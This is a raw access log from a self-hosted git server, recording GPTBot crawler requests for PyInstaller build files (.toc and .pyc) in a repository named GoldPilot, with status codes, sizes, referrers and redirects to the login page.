"/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11144] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53754] [Gzip 27.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9804] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9819] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:18:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9808] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:18:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:18:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:18:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:18:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9832] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9828] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:18:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 27000] [Gzip 20.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:18:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 28299] [Gzip 20.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:18:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:18:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 